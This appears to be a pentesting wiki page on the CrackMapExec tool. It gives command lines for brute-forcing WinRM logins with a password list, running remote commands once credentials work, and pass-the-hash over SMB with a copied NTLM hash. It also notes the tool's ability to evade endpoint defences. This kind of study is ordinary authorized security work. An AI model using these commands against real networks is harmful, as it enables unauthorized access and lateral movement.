====== CrackMapExec (CME) ======

**CrackMapExec:** "A swiss army knife for pentesting networks..."
  * CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. 
  * Built with stealth in mind, CME follows the concept of “Living off the Land”: abusing built-in Active Directory features/protocols to achieve it’s functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.
  * See the [[https://ptestmethod.readthedocs.io/en/latest/cme.html | documentation]] for other help and examples.

**Supported Protocols:** WinRM, MSSQL, SMB, SSH

For help and syntax, just issue the command: ''crackmapexec'' or...

<code>
crackmapexec -h
crackmapexec winrm -h # (for help specific to the winrm protocol)
crackmapexec smb -h   # (for help specific to the smb protocol)
</code>

**General Syntax:**

<code>
crackmapexec <protocol> <target(s)> -u username -p password
</code>

**Examples:**

<code>
crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@' # or...
crackmapexec <protocol> <target(s)> -u='username' -p='Admin!123@'
</code>

===== CME & WinRM =====

**Syntax:**

<code>
crackmapexec winrm [target ip] -u administrator -p /usr/share/.../unix_passwords.txt
</code>

You can use the ''-u'' switch to specify a file of possible user names to try.
  * But, if we can get into the admin account, we don't have to do priv esc (so we test with one username, "administrator," first).
  * You should get a green "**[+]**" if successful.

Look over the output (from the top down): 
  * First line: you can see it actually connects to WinRM.
  * NOTE: wsman is an implementation of WinRM: windows management.

**Execute Commands:** If you successfully found login credentials, you can crackmapexec to execute arbitrary Windows commands on the target machine. Syntax:

<code>
crackmapexec winrm [target ip] -u administrator -p [password]-x "whoami"
crackmapexec winrm [target ip] -u administrator -p [password] -x "systeminfo"
</code>

You should get some happy feedback along with the results of your command execution.
  * ''systeminfo'' (Windows) takes a while to run but provides a lot of information about your target system.

===== CME & Pass-the-Hash =====

<code>
crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]"
</code>

This should indicated whether or not it works. 
  * If you get a green **[+]** and **(Pwn3d!)** then it works and you can try the execution of commands on the system...

<code>
crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]" -x "ipconfig"
</code> 

It should give you visual feedback about the command execution. And there you go. Execute what you want.




----